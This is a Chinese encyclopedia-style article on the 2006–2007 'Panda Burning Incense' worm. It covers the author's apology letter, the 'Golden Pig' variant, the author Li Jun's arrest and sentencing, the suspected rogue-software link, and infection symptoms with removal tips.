　　我要解釋一些事情,有人說熊貓燒香更改熊貓的圖標是我在詆毀大熊貓!這裏我要解釋下,這是絶對沒有的事情,完全是出於這個圖片比較讓我個人喜歡,纔會用的!
　　還有關於變種,我寫這個的初衷也是這個,純粹是為了編程研究,對於出了這麽多變種,我是根本想不到的,這個責任也不全是在我的!還有人說熊貓病毒寫出來是商業目的!這個完全是無稽之談.我在這裏承諾,本人是絶對沒有更新過任何變種!
　　關於中毒後的一些錯誤,有人中毒後會有藍屏,無聲,卡死,文件丟失這些現象!藍屏和死機的原因很多可能,熊貓的主程序是不會造成電腦死機或藍屏的,更不會把別人裏面的文件弄丟失!
　　還有人說我是個心理變態,我在前面已經說了,感染的速度,變種的數量是我所料想不到的.還有,我寫這個病毒的初衷完全是為了編程研究.對於這個評論,我也就不多說什麽了!
　　最後就是關於我的身份,大傢不要再猜測我是誰了,15歲的武漢男生也好,是個女的也好,某公司老總也好,殺毒廠商也好,光是新聞的評論,網友的臭駡已經讓我後悔之極了!希望熊貓病毒不要再成為炒作的娛樂新聞,不要再出任何關於熊貓新聞和評論!希望安全軟件公司,不要吹噓,相互詆毀,相互炒作,盡力做出讓人們信賴的好安全軟件!謝謝大傢!
　　這是我寫的一個專殺程序,肯定是比不上專業級的殺毒軟件了,但是我想這是我最後能給大傢做的事情了.
　　熊貓走了,是結束嗎?不是的,網絡永遠沒有安全的時候,或許在不久,會有很多更厲害的病毒出來!所以我在這裏提醒大傢,提高網絡安全意識,並不是你應該註意的,而是你必須懂得和去做的一些事情!
　　再一次表示深深的歉意,同時我發出這個專殺,願能給大傢帶來幫助!
　　熊貓燒香的作者
　　2007年2月9日於仙桃市第一看守所

變種：金豬報喜

　　金豬報喜病毒實際就是最近熊貓燒香的新變種，
　　春節將至，然而廣大網絡用戶仍沒有徹底襬脫“熊貓燒香”的陰霾。伴隨着大量“熊貓燒香”變種的出現，對用戶的危害一浪高過一浪。1月29日，來自金山毒霸反病毒中心最新消息：“熊貓燒香”化身“金豬”，危害指數再度升級，被感染的電腦中不但“熊貓”成群，而且“金豬”滿圈。但象徵財富的金豬仍然讓用戶無法擺脫“係統被破壞，大量應用軟件無法應用”的噩夢。
　　病毒描述：
　　“武漢男生”，俗稱“熊貓燒香”，近日又化身為“金豬報喜” ，這是一個感染型的蠕蟲病毒，它能感染係統中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進程並且會刪除擴展名為gho的文件，該文件是一係統備份工具ghost的備份文件，使用戶的係統備份文件丟失。被感染的用戶係統中所有.exe可執行文件全部被改成可愛金豬的模樣。
　　1月30日，江民科技反病毒中心監測到，肆虐互聯網的“熊貓燒香”又出新變種。此次變種把“熊貓燒香”圖案變成“金豬報喜”。江民反病毒專傢提醒用戶，春節臨近，謹防春節期間病毒藉人們互

基本信息

　　病毒名稱:熊貓燒香，Worm.WhBoy.（金山稱），Worm.Nimaya.（瑞星稱）
　　病毒別名：尼姆亞，武漢男生，後又化身為“金豬報喜”，國外稱“熊貓燒香”
　　危險級別：★★★★★
　　病毒類型：蠕蟲病毒，能夠終止大量的反病毒軟件和防火墻軟件進程。
　　影響係統：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista
　　發現時間：2006年10月16日
　　來源地：中國武漢東湖高新技術開發區關山

熊貓燒香的第一版作者道歉信

病毒製造者

　　該病毒作者是李俊，武漢新洲區人，25歲。據他的傢人以及朋友介紹，他在初中時英語和數學成績都很不錯，但還是沒能考上高中，中專在媧石職業技術學校就讀，學習的是水泥工藝專業，畢業後曾上過網絡技術職業培訓班，他朋友講他是“自學成纔，他的大部分電腦技術都是看書自學的”。2004年李俊到北京、廣州的網絡安全公司求職，但都因學歷低的原因遭拒，於是他開始抱着報復社會以及賺錢的目的編寫病毒了。他曾在2003年編寫了病毒“武漢男生”，2005年他還編寫了病毒QQ尾巴，並對“武漢男生”版本更新成為“武漢男生2005”。
　　此次傳播的“熊貓燒香”病毒，作者李俊是先將此病毒在網絡中賣給了120餘人，每套産品要價500～1000元人民幣，每日可以收入8000元左右，最多時一天能賺1萬餘元人民幣，作者李俊因此直接非法獲利10萬餘元。然後由這120餘人對此病毒進行改寫處理並傳播出去的，這120餘人的傳播造成100多萬臺計算機感染此病毒，他們將盜取來的網友網絡遊戲以及QQ帳號進行出售牟利，並使用被病毒感染淪陷的機器組成“僵屍網絡”為一些網站帶來流量。
　　2007年2月12日湖北省公安廳12日宣佈，根據統一部署，湖北網監在浙江、山東、廣西、天津、廣東、四川、江西、雲南、新疆、河南等地公安機關的配合下，一舉偵破了製作傳播“熊貓燒香”病毒案，抓獲病毒作者李俊。這是中國警方破獲的首例計算機病毒大案。其他重要犯罪嫌疑人：雷磊（男，25歲，武漢新洲區人）、王磊（男，22歲，山東威海人）、葉培新（男，21歲，浙江溫州人）、張順（男，23歲，浙江麗水人）、王哲（男，24歲，湖北仙桃人）通過改寫、傳播“熊貓燒香”等病毒，構建“僵屍網絡”，通過盜竊各種遊戲賬號等方式非法牟利。這是中國近些年來，發生比較嚴重的一次蠕蟲病毒發作。影響較多公司，造成較大的損失。且對於一些疏於防範的用戶來說，該病毒導致較為嚴重的損失。由於此病毒可以盜取用戶名與密碼，因此，帶有明顯的牟利目的。所以，作者纔有可能將此病毒當作商品出售，與一般的病毒製作者衹是自娛自樂、或顯示威力、或炫耀技術有很大的不同。另，製作者李俊在被捕後，在公安的監視下，又在編寫解毒軟件。
　　2007年9月24日，湖北省仙桃市人民法院一審以破壞計算機信息係統罪判處李俊有期徒刑四年、王磊有期徒刑二年六個月、張順有期徒刑二年、雷磊有期徒刑一年，並判决李俊、王磊、張順的違法所得予以追繳

變種病毒

　　至此，據不完全統計，僅12月份至今，變種數已達90多個，個人用戶感染熊貓燒香的已經高達幾百萬，企業用戶感染數還在繼續上升。反防毒專傢表示，伴隨着各大殺毒廠商對“熊貓燒香”病毒的集中絞殺，該病毒正在不斷“繁衍”新的變種，密謀更加隱蔽的傳播方式。反病毒專傢建議，用戶不打開可疑郵件和可疑網站，不要隨便運行不知名程序或打開陌生人郵件的附件。
　　變種：金豬報喜金豬報喜病毒實際就是最近熊貓燒香的新變種。春節將至，然而廣大網絡用戶仍沒有徹底襬脫“熊貓燒香”的陰霾。伴隨着大量“熊貓燒香”變種的出現，對用戶的危害一浪高過一浪。1月29日，來自金山毒霸反病毒中心最新消息：“熊貓燒香”化身“金豬”，危害指數再度升級，被感染的電腦中不但“熊貓”成群，而且“金豬”滿圈。但象徵財富的金豬仍然讓用戶無法擺脫“係統被破壞，大量應用軟件無法應用”的噩夢。
　　病毒描述：
　　“武漢男生”，俗稱“熊貓燒香”，近日又化身為“金豬報喜” ，這是一個感染型的蠕蟲病毒，它能感染係統中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進程並且會刪除擴展名為gho的文件，該文件是一係統備份工具GHOST的備份文件，使用戶的係統備份文件丟失。被感染的用戶係統中所有.exe可執行文件全部被改成可愛金豬的模樣。
　　1月30日，江民科技反病毒中心監測到，肆虐互聯網的“熊貓燒香”又出新變種。此次變種把“熊貓燒香”圖案變成“金豬報喜”。江民反病毒專傢提醒用戶，春節臨近，謹防春節期間病毒藉人們互緻祝福之際大面積爆發。
　　專傢介紹，“熊貓燒香”去年11月中旬被首次發現，短短兩個月時間，新老變種已達700多種個，據江民反病毒預警中心監測到的數據顯示，“熊貓燒香”病毒去年12月一舉闖入病毒排名前20名，1月份更是有望進入前10名。疫情最嚴重的地區分別為：廣東、山東、江蘇、北京和遼寧。
　　針對該病毒，江民殺毒軟件KV係列已緊急升級，用戶升級到最新病毒庫即可有效防範該病毒於係統之外。江民“熊貓燒香”專殺工具已同步更新，未安裝殺毒軟件的用戶可以登陸江民網站下載殺毒。此外，針對“熊貓燒香”變種頻繁的特徵，江民殺毒軟件KV2007主動防禦規則庫可徹底防範“熊貓燒香”及其變種，用戶可以登陸江民反病毒論壇(forum.jiangmin.com)下載使用。
　　金山毒霸反病毒專傢戴光劍指出，伴隨着各大殺毒廠商對“熊貓燒香”病毒的集中絞殺，該病毒正在不斷“繁衍”新的變種，密謀更加隱蔽的傳播方式。據不完全統計，僅12月份至今，變種數已達90多個，個人用戶感染熊貓燒香的已經高達幾百萬，企業用戶感染數還在繼續上升。
　　此外學生寒假開始，上網人群短期內集中上升，病毒的傳播速度也空前加快，所以用戶在進行上網的過程中要更加警惕病毒的入侵。據瞭解，前幾天在網絡上出現了“熊貓燒香”作者聲稱不再有變種出現，而“金豬”的出現再次粉碎了人們的美夢，再次將人們拉回到熊貓燒香的夢魘之中。專傢稱，按照目前“熊貓燒香”破壞程度，威脅將延伸至春節。
　　專傢提醒大傢，遇到“金豬”不要心慌，用熊貓燒香專殺工具就可以完全對付這衹小金豬啦！

相關報道和評論

　　‘流氓軟件’和病毒之間的界限已變得越來越模糊。為了達到更好的傳播效果，並減少成本，不少中小廠商直接使用病毒進行‘流氓推廣’。”昨日，反病毒專傢直指流氓軟件是這次“熊貓燒香”幕後黑手。
　　據江民公司反病毒工程師稱，已經發現了近期瘋狂肆虐的“熊貓燒香”幕後勢力的痕跡，“熊貓燒香”病毒被懷疑是由“超級巡警”軟件的提供方在幕後推動，網上已經發現了産銷一條竜盜竊銷售網遊設備的産業鏈。
　　而從瑞星截獲的“熊貓燒香(Worm.Nimaya)”樣本進行分析，也有不少變種運行後會去從網上下載盜取“江湖”、“大話西遊”、“魔獸”等網絡遊戲賬號的木馬。用戶的計算機一旦被感染這些木馬，遊戲的賬號、裝備等就會被黑客竊取。黑客通過在網上倒賣網遊賬號、裝備等獲利。
　　流氓軟件分化：部分“洗白” 部分病毒化。全民範圍內的討伐使流氓軟件開始出現“分化”。
　　北京瑞星股份有限公司反病毒工程師史瑀嚮《每日經濟新聞》表示，迫於技術和輿論的壓力，製作流氓軟件的廠商開始兩極分化。一些大牌互聯網廠商逐漸“洗白”，將軟件的“流氓”程度降低，還有一些廠商幹脆放棄推廣“流氓軟件”。然而，仍有大量的中小廠商是通過“流氓軟件”起傢的，通過“流氓軟件”進行廣告推廣已經成為其公司主要甚至是唯一的收入來源。2006年下半年開始，一些廠商為了生存，不惜鋌而走險，使用更加卑劣的手段進行流氓推廣，並且采用更加惡毒的技術公然嚮反病毒軟件、反流氓軟件工具挑戰。
　　據瑞星公司客戶服務中心的統計數據表明，從2006年6月開始，用戶計算機由於流氓軟件問題導致崩潰的求助數量已經超過了病毒。
　　據專傢介紹，這一時期的“流氓軟件”有兩大特點：一是編寫病毒化。不少“流氓軟件”為了防止被殺毒軟件或流氓軟件卸載工具發現，采用了病毒常用的Rootkit技術進行自我保護。Rootkit可以對自身及指定的文件進行隱藏或鎖定，防止被發現和刪除。帶有Rootkit的“流氓軟件”就像練就了“金鐘罩”、“鐵布杉”，不除去這層保護根本難傷其毫發。更有一些流氓軟件，采用“自殺式”技術攻擊殺毒軟件。一旦發現用戶安裝或運行殺毒軟件，便運行惡意代碼，直接造成計算機死機、藍屏，讓用戶誤以為是殺毒軟件存在問題。
　　二是傳播病毒化。為了達到更好的傳播效果，並減小成本，不少中小廠商直接使用病毒進行“流氓推廣”。用戶的計算機感染病毒後，病毒會自動在後臺運行，下載並安裝“流氓軟件”。同時，“流氓軟件”安裝後也會去從互聯網自動下載運行病毒。大量的“流氓軟件”開始使用電腦病毒來隱藏自身、進行快速傳播、並對抗用戶的清除等，這些行為嚴重危害到用戶的信息安全和利益。“流氓軟件”和病毒之間的界限已變得越來越模糊。隨着“流氓軟件”不斷朝着病毒的方向發展，要想徹底殺滅“流氓軟件”就必須采用反病毒技術。
　　利益驅使流氓軟件製造“熊貓燒香”？
　　史瑀表示，2006年11月14日，瑞星發佈流氓軟件專用清除工具———卡卡上網安全助手3.0，首次將反病毒技術應用於反流氓軟件當中。就在卡卡剛剛發佈24小時，就有一個名為“my123”的惡意程序頂風作案，瘋狂采用病毒化的編寫技術來逃避卡卡的追殺，隨後又出現了名為“3448.com”和“7939.com”兩個流氓軟件，它們鎖定用戶瀏覽器的首頁以提高其網站訪問量。
　　此後，部分流氓軟件開始和病毒合作。早先一個傳播較廣的蠕蟲病毒“威金蠕蟲(Worm.Viking)”，就會從病毒作者指定的網站去下載流氓軟件、盜號木馬等，並種植在用戶的計算機上。
　　“大量‘流氓軟件’開始使用電腦病毒來隱藏自身、進行快速傳播、並對抗用戶的清除等，這些行為嚴重危害到用戶的信息安全和利益。”史瑀稱，“‘熊貓燒香’病毒成為一個‘教科書’式的病毒，勢必有大量的病毒會模仿它的特徵進行編寫。”
　　1月29日，金山毒霸反病毒中心最新消息：“熊貓燒香”化身“金豬”，危害指數再度升級，按照目前“熊貓燒香”破壞程度，威脅將延伸至春節。而在瑞星全球反病毒監測網27日監測結果顯示，27日一個“電眼間諜變種BSF(Trojan.Spy.Delf.bsf)”病毒又出現，該病毒與“熊貓燒香”病毒類似。
　　而業內人士稱，近日由於地震引起海底光纜中斷，造成數百萬使用國外殺毒軟件的個人用戶、數十萬企業和政府局域網用戶無法升級。這又意味着這些用戶的電腦完全嚮病毒和黑客敞開了大門。
　　“在沒有法律法規出臺前，流氓軟件是不會縮手的，不排除‘熊貓燒香’是流氓軟件所為。”昨日，中國反流氓軟件聯盟李佳衡表示：“衹要有利益驅使，流氓軟件就會變化形式，以更不容易察覺的病毒方式毫無忌憚地牟取利益。”
　　熊貓燒香”化身“金豬”，春節大爆發。
　　“長假是病毒的高發期，特別是長假之後，病毒綜合癥接踵而來。”金山毒霸反病毒專傢戴光劍說，“目前我們已經截獲‘金豬’的變種。被感染的電腦中不但‘熊貓’成群，而且‘金豬’能使係統被破壞，大量軟件無法應用。”這一觀點得到了上海市計算機病毒防範服務中心的認同。
　　一旦中毒，用戶也不用慌張，用戶可撥打上海市信息化服務熱綫電話9682000尋求幫助。
　　“熊貓燒香”病毒攻略：防禦和解除方法
　　計世網消息在2007年新年出現的“PE_FUJACKS”就是最近讓廣大互聯網用戶聞之色變的“熊貓燒香”。該病毒的作者為“武漢男生”(文件末簽名”WhBoy”)，這個版本的病毒已經集成了PE_FUJA CK和QQ大盜的代碼，通過網絡共享,文件感染和移動存儲設備傳播，尤其是感染網頁文件，並在網頁文件寫入自動更新的代碼，一旦瀏覽該網頁，就會感染更新後的變種。
　　不幸中招的用戶都知道，“熊貓燒香”會占用局域網帶寬，使得電腦變得緩慢，計算機會出現以下癥狀：熊貓燒香病毒會在網絡共享文件夾中生成一個名為GameSetup.exe的病毒文件；結束某些應用程序以及防毒軟件的進程，導致應用程序異常，或不能正常執行，或速度變慢；硬盤分區或者U盤不能訪問使用；exe程序無法使用程序圖標變成熊貓燒香圖標；硬盤的根目錄出現setup.exe auturun.INF文件；同時瀏覽器會莫名其妙地開啓或關閉。
　　該病毒主要通過瀏覽惡意網站、網絡共享、文件感染和移動存儲設備(如U盤)等途徑感染，其中網絡共享和文件感染的風險係數較高，而通過Web和移動存儲感染的風險相對較低。該病毒會自行啓動安裝，生成註册列表和病毒文件%System%driversspoclsv.exe ，並在所有磁盤跟目錄下生成病毒文件setup.exe,autorun.inf 。
　　應用統一變為熊貓燒香的圖標其實就是在註册表的HKEY_CLASSES_ROOT這個分支中寫入了一個值，將所有的EXE文件圖標指嚮一個圖標文件，所以一般衹要刪除此值，改回原貌就可以了。

相關詞

病毒

瑞星

卡巴斯基

尼姆亞

包含詞

新版熊貓燒香	熊貓燒香蠕蟲	熊貓燒香變種
熊貓燒香釋放器	熊貓燒香專殺工具	熊貓燒香病毒變種
“熊貓燒香”變種auw	熊貓燒香”變種auw	熊貓燒香專用清除工具
熊貓燒香的病毒源碼	worm.nimaya熊貓燒香專用清除工具	熊貓燒香病毒變種spoclsv.exe